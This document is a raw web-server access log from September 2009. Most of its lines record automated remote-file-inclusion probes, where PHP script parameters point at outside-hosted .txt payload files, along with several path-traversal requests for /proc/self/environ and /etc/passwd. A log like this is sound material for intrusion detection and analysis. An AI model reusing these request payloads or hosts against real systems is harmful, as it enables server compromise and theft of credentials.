79.174.78.83 - - [07/Sep/2009:05:45:18 -0500] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
79.174.78.83 - - [07/Sep/2009:05:45:18 -0500] "GET /logs/access_log.1247270400//bbs//skin/ggambo7002_board/write.php?dir=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 347 "-""Mozilla/5.0"
74.50.85.104 - - [07/Sep/2009:05:45:22 -0500] "GET /logs/access_log.1228608000////vwar/backup/errors.php?error=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
65.55.208.123 - - [07/Sep/2009:05:45:55 -0500] "GET /logs/access_log.1121817600 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
74.50.85.104 - - [07/Sep/2009:05:46:07 -0500] "GET /logs/access_log.1228608000////vwar/backup/errors.php?error=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
65.55.165.107 - - [07/Sep/2009:05:50:18 -0500] "GET /logs/access_log.1139184000 HTTP/1.1" 200 803 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SLCC1; .NET CLR 1.1.4325; .NET CLR 2.0.40607; .NET CLR 3.0.30729; .NET CLR 3.5.30707)"
195.190.166.35 - - [07/Sep/2009:05:51:05 -0500] "GET /errors.php?error=http://tvse.nl/images/id.txt?%0D?? HTTP/1.1" 404 293 "-""libwww-perl/5.65"
195.190.166.35 - - [07/Sep/2009:05:51:05 -0500] "GET /logs/errors.php?error=http://tvse.nl/images/id.txt?%0D?? HTTP/1.1" 404 298 "-""libwww-perl/5.65"
80.67.26.40 - - [07/Sep/2009:05:51:17 -0500] "GET /errors.php?error=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
80.67.26.40 - - [07/Sep/2009:05:53:39 -0500] "GET /logs/errors.php?error=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
80.67.26.40 - - [07/Sep/2009:05:53:39 -0500] "GET /errors.php?error=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
80.67.26.40 - - [07/Sep/2009:05:53:39 -0500] "GET /logs/access_log.1230249600/errors.php?error=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
61.63.4.74 - - [07/Sep/2009:05:54:11 -0500] "GET ////vwar/backup/errors.php?error=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 308 "-""Mozilla/5.0"
61.63.4.74 - - [07/Sep/2009:05:54:11 -0500] "GET /logs/access_log.1228608000////vwar/backup/errors.php?error=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 335 "-""Mozilla/5.0"
61.63.4.74 - - [07/Sep/2009:05:54:12 -0500] "GET /logs////vwar/backup/errors.php?error=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 313 "-""Mozilla/5.0"
212.204.254.54 - - [07/Sep/2009:05:54:17 -0500] "GET /logs/Mg.php?Ec=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
212.204.254.54 - - [07/Sep/2009:05:54:17 -0500] "GET /Mg.php?Ec=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.803"
222.122.72.216 - - [07/Sep/2009:05:54:18 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.compassionbydesign.org/wp-content/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
222.122.72.216 - - [07/Sep/2009:05:54:18 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.compassionbydesign.org/wp-content/id1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
222.122.72.216 - - [07/Sep/2009:05:54:18 -0500] "GET /logs/access_log.1236211200/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.compassionbydesign.org/wp-content/id1.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
212.204.254.54 - - [07/Sep/2009:05:54:24 -0500] "GET /logs/Mg.php?Ec=http://maderasglob.no.comunidades.net/cmdstate.txt???? HTTP/1.1" 404 294 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
212.204.254.54 - - [07/Sep/2009:05:54:25 -0500] "GET /Mg.php?Ec=http://maderasglob.no.comunidades.net/cmdstate.txt???? HTTP/1.1" 404 289 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
80.67.26.40 - - [07/Sep/2009:05:54:45 -0500] "GET /logs/access_log.1235260800/errors.php?error=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
222.236.47.23 - - [07/Sep/2009:05:56:12 -0500] "GET /logs/errors.php?error=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
222.236.47.23 - - [07/Sep/2009:05:56:12 -0500] "GET /errors.php?error=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
222.236.47.23 - - [07/Sep/2009:05:56:12 -0500] "GET /logs/access_log.1230249600/errors.php?error=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
212.204.254.54 - - [07/Sep/2009:05:56:14 -0500] "GET /logs/errors.php?error=http://maderasglob.no.comunidades.net/cmdstate.txt???? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
212.204.254.54 - - [07/Sep/2009:05:56:14 -0500] "GET /errors.php?error=http://maderasglob.no.comunidades.net/cmdstate.txt???? HTTP/1.1" 404 293 "-""libwww-perl/5.803"
222.236.47.23 - - [07/Sep/2009:05:56:16 -0500] "GET /logs/access_log.1230249600/errors.php?error=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
222.236.47.23 - - [07/Sep/2009:05:56:16 -0500] "GET /errors.php?error=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
222.236.47.23 - - [07/Sep/2009:05:56:17 -0500] "GET /logs/errors.php?error=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
222.236.47.23 - - [07/Sep/2009:05:57:22 -0500] "GET /logs/access_log.1235260800/errors.php?error=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
222.236.47.23 - - [07/Sep/2009:05:57:31 -0500] "GET /logs/access_log.1235260800/errors.php?error=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
212.80.229.6 - - [07/Sep/2009:05:58:45 -0500] "GET /logs/access_log.1237334400/mygallerybrowser.php?myPath=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 318 "-""libwww-perl/5.48"
212.80.229.6 - - [07/Sep/2009:05:58:45 -0500] "GET /mygallerybrowser.php?myPath=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 291 "-""libwww-perl/5.48"
212.80.229.6 - - [07/Sep/2009:05:58:46 -0500] "GET /logs/mygallerybrowser.php?myPath=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 296 "-""libwww-perl/5.48"
65.55.165.92 - - [07/Sep/2009:05:58:46 -0500] "GET /logs/access_log.1132099200 HTTP/1.1" 200 1939 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4325; .NET CLR 2.0.40607; .NET CLR 3.0.30729; .NET CLR 3.5.30729; MS-RTC LM 8)"
212.80.229.6 - - [07/Sep/2009:05:59:42 -0500] "GET /logs/mygallerybrowser.php?myPath=http://maderasglob.no.comunidades.net/cmdstate.txt???? HTTP/1.0" 404 296 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
212.80.229.6 - - [07/Sep/2009:05:59:42 -0500] "GET /mygallerybrowser.php?myPath=http://maderasglob.no.comunidades.net/cmdstate.txt???? HTTP/1.0" 404 291 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
212.80.229.6 - - [07/Sep/2009:05:59:48 -0500] "GET /logs/mygallerybrowser.php?myPath=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 296 "-""libwww-perl/5.48"
212.80.229.6 - - [07/Sep/2009:05:59:48 -0500] "GET /mygallerybrowser.php?myPath=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 291 "-""libwww-perl/5.48"
125.141.196.8 - - [07/Sep/2009:06:00:09 -0500] "GET /logs/access_log.1227657600/errors.php?error=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
125.141.196.8 - - [07/Sep/2009:06:00:09 -0500] "GET /errors.php?error=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
125.141.196.8 - - [07/Sep/2009:06:00:09 -0500] "GET /logs/errors.php?error=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
72.29.82.154 - - [07/Sep/2009:06:01:04 -0500] "GET /logs/errors.php?error=http://www.medialabs.it/wordpress/fx29id1.txt???? HTTP/1.1" 404 298 "-""Mozilla/5.0"
72.29.82.154 - - [07/Sep/2009:06:01:04 -0500] "GET /errors.php?error=http://www.medialabs.it/wordpress/fx29id1.txt???? HTTP/1.1" 404 293 "-""Mozilla/5.0"
72.29.82.154 - - [07/Sep/2009:06:01:04 -0500] "GET /logs/access_log.1236038400/errors.php?error=http://www.medialabs.it/wordpress/fx29id1.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
72.29.82.154 - - [07/Sep/2009:06:01:04 -0500] "GET /logs/access_log.1237075200/errors.php?error=http://www.medialabs.it/wordpress/fx29id1.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
125.141.196.8 - - [07/Sep/2009:06:01:57 -0500] "GET /logs/errors.php?error=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
125.141.196.8 - - [07/Sep/2009:06:01:57 -0500] "GET /logs/access_log.1227657600/errors.php?error=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
125.141.196.8 - - [07/Sep/2009:06:01:58 -0500] "GET /errors.php?error=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
72.29.82.154 - - [07/Sep/2009:06:02:57 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.medialabs.it/wordpress/fx29id1.txt???? HTTP/1.1" 404 337 "-""Mozilla/5.0"
72.29.82.154 - - [07/Sep/2009:06:02:57 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.medialabs.it/wordpress/fx29id1.txt???? HTTP/1.1" 404 342 "-""Mozilla/5.0"
72.29.82.154 - - [07/Sep/2009:06:03:04 -0500] "GET /logs/access_log.1236038400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.medialabs.it/wordpress/fx29id1.txt???? HTTP/1.1" 404 364 "-""Mozilla/5.0"
72.29.82.154 - - [07/Sep/2009:06:03:05 -0500] "GET /logs/access_log.1237075200//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.medialabs.it/wordpress/fx29id1.txt???? HTTP/1.1" 404 364 "-""Mozilla/5.0"
82.146.119.209 - - [07/Sep/2009:06:04:20 -0500] "GET /logs/access_log.1247011200//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
82.146.119.209 - - [07/Sep/2009:06:04:20 -0500] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
82.146.119.209 - - [07/Sep/2009:06:04:20 -0500] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
82.146.119.209 - - [07/Sep/2009:06:04:24 -0500] "GET /logs/access_log.1243814400//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
212.80.229.6 - - [07/Sep/2009:06:05:43 -0500] "GET /logs/errors.php?error=http://maderasglob.no.comunidades.net/cmdstate.txt???? HTTP/1.0" 404 286 "-""libwww-perl/5.48"
212.80.229.6 - - [07/Sep/2009:06:05:43 -0500] "GET /errors.php?error=http://maderasglob.no.comunidades.net/cmdstate.txt???? HTTP/1.0" 404 281 "-""libwww-perl/5.48"
78.111.80.234 - - [07/Sep/2009:06:06:52 -0500] "GET //bbs/skin/ggambo7002_board/write.php?dir=http://www.b92.net/system/files/id1.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
78.111.80.234 - - [07/Sep/2009:06:06:52 -0500] "GET /logs/access_log.1247356800//bbs/skin/ggambo7002_board/write.php?dir=http://www.b92.net/system/files/id1.txt??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
78.111.80.234 - - [07/Sep/2009:06:06:52 -0500] "GET /logs//bbs/skin/ggambo7002_board/write.php?dir=http://www.b92.net/system/files/id1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
78.111.80.234 - - [07/Sep/2009:06:07:07 -0500] "GET /logs/access_log.1247616000//bbs/skin/ggambo7002_board/write.php?dir=http://www.b92.net/system/files/id1.txt??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
69.175.25.226 - - [07/Sep/2009:06:08:28 -0500] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
69.175.25.226 - - [07/Sep/2009:06:08:28 -0500] "GET /logs/access_log.1247011200//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
69.175.25.226 - - [07/Sep/2009:06:08:28 -0500] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
69.175.25.226 - - [07/Sep/2009:06:08:32 -0500] "GET /logs/access_log.1243814400//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
218.38.136.251 - - [07/Sep/2009:06:09:46 -0500] "GET ///vwar/backup/errors.php?error=http://aflamsat.com/kernel/linux/idxx.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
218.38.136.251 - - [07/Sep/2009:06:09:46 -0500] "GET /logs/access_log.1229385600///vwar/backup/errors.php?error=http://aflamsat.com/kernel/linux/idxx.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
218.38.136.251 - - [07/Sep/2009:06:09:46 -0500] "GET /logs///vwar/backup/errors.php?error=http://aflamsat.com/kernel/linux/idxx.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
195.190.166.35 - - [07/Sep/2009:06:10:59 -0500] "GET /logs/errors.php?error=http://tvse.nl/images/id.txt?%0D?? HTTP/1.1" 404 298 "-""libwww-perl/5.65"
195.190.166.35 - - [07/Sep/2009:06:10:59 -0500] "GET /errors.php?error=http://tvse.nl/images/id.txt?%0D?? HTTP/1.1" 404 293 "-""libwww-perl/5.65"
222.122.72.216 - - [07/Sep/2009:06:14:38 -0500] "GET /logs/access_log.1233100800/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.compassionbydesign.org/wp-content/id1.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
66.90.115.6 - - [07/Sep/2009:06:17:28 -0500] "GET /logs/access_log.1244764800///?_SERVER[DOCUMENT_ROOT]=http://gn.fileave.com/id1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
66.90.115.6 - - [07/Sep/2009:06:17:28 -0500] "GET ///?_SERVER[DOCUMENT_ROOT]=http://gn.fileave.com/id1.txt? HTTP/1.1" 200 3246 "-""Mozilla/5.0"
66.90.115.6 - - [07/Sep/2009:06:17:29 -0500] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://gn.fileave.com/id1.txt? HTTP/1.1" 200 204076 "-""Mozilla/5.0"
218.208.21.7 - - [07/Sep/2009:06:19:01 -0500] "GET /logs///include/footer.php?_path[counter]=http://www.rucoc.com/pepek.jpg???? HTTP/1.1" 404 308 "-""libwww-perl/5.79"
218.208.21.7 - - [07/Sep/2009:06:19:08 -0500] "GET ///include/footer.php?_path[counter]=http://www.rucoc.com/pepek.jpg???? HTTP/1.1" 404 303 "-""libwww-perl/5.79"
78.111.80.234 - - [07/Sep/2009:06:19:33 -0500] "GET //bbs/skin/ggambo7002_board/comment_modify.php?dir=http://www.b92.net/system/files/id1.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
78.111.80.234 - - [07/Sep/2009:06:19:33 -0500] "GET /logs//bbs/skin/ggambo7002_board/comment_modify.php?dir=http://www.b92.net/system/files/id1.txt??? HTTP/1.1" 404 333 "-""Mozilla/5.0"
78.111.80.234 - - [07/Sep/2009:06:19:33 -0500] "GET /logs/access_log.1247356800//bbs/skin/ggambo7002_board/comment_modify.php?dir=http://www.b92.net/system/files/id1.txt??? HTTP/1.1" 404 355 "-""Mozilla/5.0"
78.111.80.234 - - [07/Sep/2009:06:19:56 -0500] "GET /logs/access_log.1247616000//bbs/skin/ggambo7002_board/comment_modify.php?dir=http://www.b92.net/system/files/id1.txt??? HTTP/1.1" 404 355 "-""Mozilla/5.0"
218.38.136.251 - - [07/Sep/2009:06:28:12 -0500] "GET //include/write.php?dir=http://aflamsat.com/kernel/linux/idxx.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
218.38.136.251 - - [07/Sep/2009:06:28:12 -0500] "GET /logs//include/write.php?dir=http://aflamsat.com/kernel/linux/idxx.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
218.38.136.251 - - [07/Sep/2009:06:28:12 -0500] "GET /logs/access_log.1233964800//include/write.php?dir=http://aflamsat.com/kernel/linux/idxx.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
74.6.17.189 - - [07/Sep/2009:06:37:21 -0500] "GET /robots.txt HTTP/1.0" 404 281 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.17.189 - - [07/Sep/2009:06:37:21 -0500] "GET /logs/access_log.1169856000 HTTP/1.0" 200 20066 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
80.67.26.40 - - [07/Sep/2009:06:38:37 -0500] "GET //errors.php?error=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
125.141.196.8 - - [07/Sep/2009:06:41:22 -0500] "GET /logs/access_log.1237075200//errors.php?error=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
125.141.196.8 - - [07/Sep/2009:06:41:22 -0500] "GET //errors.php?error=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
125.141.196.8 - - [07/Sep/2009:06:41:22 -0500] "GET /logs//errors.php?error=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
125.141.196.8 - - [07/Sep/2009:06:41:22 -0500] "GET /logs/access_log.1236038400//errors.php?error=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
222.122.72.216 - - [07/Sep/2009:06:43:28 -0500] "GET /logs/access_log.1236902400/lostpasswd.php?env[include_prefix]=http://www.compassionbydesign.org/wp-content/id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
222.122.72.216 - - [07/Sep/2009:06:43:28 -0500] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.compassionbydesign.org/wp-content/id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
222.122.72.216 - - [07/Sep/2009:06:43:28 -0500] "GET /lostpasswd.php?env[include_prefix]=http://www.compassionbydesign.org/wp-content/id1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
222.122.72.216 - - [07/Sep/2009:06:43:50 -0500] "GET /logs/access_log.1237075200/lostpasswd.php?env[include_prefix]=http://www.compassionbydesign.org/wp-content/id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
117.110.59.2 - - [07/Sep/2009:06:44:45 -0500] "GET //components/com_flyspray/startdown.php?file=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
117.110.59.2 - - [07/Sep/2009:06:44:45 -0500] "GET /logs/access_log.1236211200//components/com_flyspray/startdown.php?file=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 348 "-""Mozilla/5.0"
117.110.59.2 - - [07/Sep/2009:06:44:45 -0500] "GET /logs//components/com_flyspray/startdown.php?file=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
117.110.59.2 - - [07/Sep/2009:06:45:20 -0500] "GET /logs/access_log.1244764800//components/com_flyspray/startdown.php?file=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 348 "-""Mozilla/5.0"
65.55.106.181 - - [07/Sep/2009:06:45:33 -0500] "GET /logs/access_log.1142985600 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
117.110.59.2 - - [07/Sep/2009:06:46:20 -0500] "GET /logs//components/com_flyspray/startdown.php?file=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
117.110.59.2 - - [07/Sep/2009:06:46:20 -0500] "GET //components/com_flyspray/startdown.php?file=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
117.110.59.2 - - [07/Sep/2009:06:46:20 -0500] "GET /logs/access_log.1244764800//components/com_flyspray/startdown.php?file=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 348 "-""Mozilla/5.0"
117.110.59.2 - - [07/Sep/2009:06:46:20 -0500] "GET /logs/access_log.1236211200//components/com_flyspray/startdown.php?file=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 348 "-""Mozilla/5.0"
74.50.85.104 - - [07/Sep/2009:06:47:34 -0500] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
74.50.85.104 - - [07/Sep/2009:06:47:34 -0500] "GET /logs/access_log.1236211200/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 350 "-""Mozilla/5.0"
74.50.85.104 - - [07/Sep/2009:06:47:34 -0500] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
74.50.85.104 - - [07/Sep/2009:06:47:34 -0500] "GET /logs/access_log.1237075200/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 350 "-""Mozilla/5.0"
65.55.106.229 - - [07/Sep/2009:06:50:02 -0500] "GET /logs/access_log.1155513600 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
208.80.195.47 - - [07/Sep/2009:06:51:04 -0500] "GET / HTTP/1.0" 200 3233 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mailinfo [743874]; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
119.148.69.90 - - [07/Sep/2009:06:54:54 -0500] "GET /logs/ihm.php?p=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""-"
119.148.69.90 - - [07/Sep/2009:06:54:54 -0500] "GET /ihm.php?p=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 290 "-""-"
74.50.85.104 - - [07/Sep/2009:06:56:49 -0500] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
74.50.85.104 - - [07/Sep/2009:06:56:49 -0500] "GET /logs/access_log.1236211200/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 350 "-""Mozilla/5.0"
74.50.85.104 - - [07/Sep/2009:06:56:50 -0500] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
74.50.85.104 - - [07/Sep/2009:06:56:50 -0500] "GET /logs/access_log.1237075200/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 350 "-""Mozilla/5.0"
69.64.84.44 - - [07/Sep/2009:06:57:05 -0500] "GET /logs/modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.seorakhoney.com/shop/mail/kts.txt??? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
69.64.84.44 - - [07/Sep/2009:06:57:05 -0500] "GET /modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.seorakhoney.com/shop/mail/kts.txt??? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
69.64.84.44 - - [07/Sep/2009:06:57:12 -0500] "GET /logs/modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.seorakhoney.com/shop/mail/kts.txt??? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
69.64.84.44 - - [07/Sep/2009:06:57:12 -0500] "GET /modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.seorakhoney.com/shop/mail/kts.txt??? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
65.55.106.113 - - [07/Sep/2009:06:58:34 -0500] "GET /logs/access_log.1209600000 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.106.205 - - [07/Sep/2009:07:02:33 -0500] "GET /logs/access_log.1243296000 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.106.185 - - [07/Sep/2009:07:03:02 -0500] "GET /logs/access_log.1138406400 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
61.100.186.87 - - [07/Sep/2009:07:03:57 -0500] "GET /logs//skin/uks_vote_v3010/setup.php?dir=http://golden-j.com/icon1.gif??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
61.100.186.87 - - [07/Sep/2009:07:03:57 -0500] "GET //skin/uks_vote_v3010/setup.php?dir=http://golden-j.com/icon1.gif??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
61.100.186.87 - - [07/Sep/2009:07:03:57 -0500] "GET /logs/access_log.1246147200//skin/uks_vote_v3010/setup.php?dir=http://golden-j.com/icon1.gif??? HTTP/1.1" 404 340 "-""Mozilla/5.0"
61.63.4.74 - - [07/Sep/2009:07:07:41 -0500] "GET /logs/access_log.1237075200/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 350 "-""Mozilla/5.0"
